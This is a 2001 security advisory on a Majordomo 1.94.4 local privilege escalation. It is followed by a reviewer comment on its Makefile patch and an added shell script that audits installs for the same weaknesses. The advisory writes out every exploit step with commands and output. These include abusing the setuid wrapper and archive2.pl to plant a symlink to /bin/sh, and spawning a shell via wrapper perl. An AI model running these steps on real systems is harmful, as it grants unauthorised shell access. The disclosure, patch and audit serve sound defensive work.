majordomo.1.94.4.txt

19 Sep 2001. Reported by Marco van Berkum. Type: packetstorm. Source: packetstormsecurity.com

Discussion on Majordomo version 1.94.4 vulnerabilities and recommendations for secure installation.

Hi,
I found something to discuss, this time involving majordomo.   
This was tested on a Slackware linux 8.0 (kernel 2.4.8);   
majordomo version 1.94.4, I also tested the other versions   
and all _default_ installs had the same problem, note that   
the versions 1.94.1 and 1.94.2 should NOT be used anymore,
those are way more simple to exploit.
  
We all know that if you install majordomo you should   
CAREFULLY read the INSTALL file, simply because else   
you will have a security problem. Only I doubt that everyone   
actually follows the guidelines. Besides that, I feel that   
Majordomo developers _could_ make a more secure default
install without affecting the functionality of the program.
A simple patch would _at least_ stop the possibilities which
are described below.
  
Also I did not find in the documents that majordomo should   
have a shell (so give it a nologin or whatever, it works fine   
without shell).   
  
An example:   
  
Who am I
marco@anubis:~$ id -a   
uid=1001(marco) gid=100(users) groups=100(users)   
  
This could happen if you give it a /home/majordomo   
  
marco@anubis:~$ ls -al /home/|grep majordomo   
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/   
  
Suidbit + executable for everyone (this is where the patch comes in)   
  
marco@anubis:~$ ls -al ~majordomo/wrapper   
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper*   
  
This is the program I'm going to abuse   
  
marco@anubis:~$ ls -al ~majordomo/archive2.pl   
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl*   
  
Make a template   
  
marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test   
  
Append majordomo's .bash_profile (or .profile etc..) with your template   
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,   
that one can use /'s, I need wrapper for becoming user majordomo though).   
  
marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test   
  
Now hit the .bash_profile (sometimes the majordomo admin might need it   
and do the same).   
  
marco@anubis:~$ su - majordomo   
Password:   
majordomo@anubis:~$ id -a   
uid=666(majordomo) gid=2(daemon) groups=2(daemon)   
majordomo@anubis:~$ exit   
  
See if it worked   
  
marco@anubis:~$ ls -al ~majordomo/sh   
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh*   
  
Jupz it worked, now someone could abuse it, let's do that.   
  
marco@anubis:~$ ~majordomo/wrapper sh   
sh-2.05$ id -a   
uid=666(majordomo) gid=2(daemon) groups=100(users)   
sh-2.05$   
  
Ok, I'm majordomo.   
  
Also, in the README file is described how one could debug majordomo.   
  
  
Finally, if you're up to mucking around in the perl code, symlinking   
perl into ~majordomo and invoking it via wrapper will give you a debug   
environment with Majordomo's permissions and view of the world:   
  
~majordomo% ./wrapper perl -d majordomo   
  
  
Well, same problem :)   
Don't forget to remove the symlink or else everyone can do this:
  
marco@anubis:~$ /home/majordomo/wrapper perl   
system("/bin/sh");   
^D   
sh-2.04$   
  
One could append the perl files to make them execute your evil code of
course, since the archive2 program appends. This could give a majordomo
uid/daemon gid shell.
  
The main point here is that we can write to majordomo owned files to
simply alter data in the lists or score a shell (and obtain a daemon
gid). Reading the INSTALL file carefully will help you to prevent this,
but I prefer to apply a patch before starting the installation to make
sure that the wrapper is not executable for everyone (it _should_ have
4750 and not 4755).
  
--- simple patch to make default install more secure ---   
  
--- Makefile.orig Fri Sep 14 09:43:45 2001   
+++ Makefile Fri Sep 14 09:44:20 2001   
@@ -42,7 +42,7 @@   
# change these values!   
WRAPPER_OWNER = root   
WRAPPER_GROUP = $(W_GROUP)   
-WRAPPER_MODE = 4755   
+WRAPPER_MODE = 4750   
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)   
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,   
# HP DomainOS) then comment out the above four lines and uncomment   
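Review bot: with WRAPPER_MODE changed from 4755 to 4750, the setuid wrapper is no longer executable by "other", so only root and members of $(W_GROUP) can invoke it; the "# change these values!" comment above WRAPPER_OWNER should say so, because whatever hands mail to Majordomo (the MTA delivering list traffic, the list administrator running the wrapper by hand) now has to be in WRAPPER_GROUP or the install silently stops working. A one-line note next to WRAPPER_GROUP = $(W_GROUP), e.g. "the MTA and list admins must be members of this group when WRAPPER_MODE is 4750", would save the next installer from debugging a permission-denied wrapper.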
  
just my 2 cents,   
grtz,   
Marco van Berkum   
--
Marco van Berkum (MB17300-RIPE), Security Engineer / Network Admin / UNIX
http://ws.obit.nl | [email protected]
"Chernobyl used Windows"
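The post describes three conditions that together hand out a shell as the majordomo user: a setuid wrapper that is world-executable (4755 instead of 4750), a symlink to sh or perl dropped into ~majordomo, and a real login shell on the majordomo account. The audit below checks all three on an existing install; it is an added example, not code from the post or from Majordomo, and assumes a Linux host whose stat(1) accepts `-c %a` (the Slackware box in the post qualifies).

```shell
#!/bin/sh
# Audit for the Majordomo weaknesses described in the post: a setuid wrapper
# everyone may run, interpreter symlinks in the majordomo home, and a usable
# login shell on the account. Added example; assumes GNU/BusyBox stat(1).

# check_wrapper_mode FILE: 0 when only owner/group may run the setuid
# wrapper (e.g. 4750), 1 when "other" has execute (the 4755 default).
check_wrapper_mode() {
    mode=$(stat -c '%a' "$1") || return 1
    other=${mode#${mode%?}}          # last octal digit = "other" bits
    case "$mode" in
        4???|6???) ;;                # setuid bit present, as expected
        *) echo "WARN: $1 mode $mode is not setuid"; return 1 ;;
    esac
    case "$other" in
        [1357]) echo "WARN: $1 mode $mode: world-executable setuid wrapper"; return 1 ;;
        *)      echo "OK:   $1 mode $mode"; return 0 ;;
    esac
}

# check_home_symlinks DIR: 1 if any symlink in DIR resolves to a shell or
# perl binary (the "sh -> /bin/sh" trick from the post), 0 otherwise.
check_home_symlinks() {
    rc=0
    for f in "$1"/* "$1"/.[!.]*; do
        [ -L "$f" ] || continue
        target=$(readlink "$f")
        case "$target" in
            */sh|*/bash|*/perl|*/perl[0-9]*) echo "WARN: $f -> $target"; rc=1 ;;
        esac
    done
    return $rc
}

# check_login_shell PASSWD_FILE USER: 1 if USER has a usable login shell
# (the post notes Majordomo runs fine with nologin), 0 otherwise.
check_login_shell() {
    entry=$(awk -F: -v u="$2" '$1 == u { print $7; found=1 } END { if (!found) print "<missing>" }' "$1")
    case "$entry" in
        "<missing>") echo "WARN: no passwd entry for $2"; return 1 ;;
        */nologin|*/false) echo "OK:   $2 shell is $entry"; return 0 ;;
        *) echo "WARN: $2 has login shell '${entry:-/bin/sh (empty field)}'"; return 1 ;;
    esac
}

# Example run against a real install (paths as in the post):
#   check_wrapper_mode /home/majordomo/wrapper
#   check_home_symlinks /home/majordomo
#   check_login_shell /etc/passwd majordomo
```

A non-zero exit from any check corresponds to one of the steps in the post; the wrapper check also flags a wrapper that lost its setuid bit, since that breaks delivery rather than weakening it.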
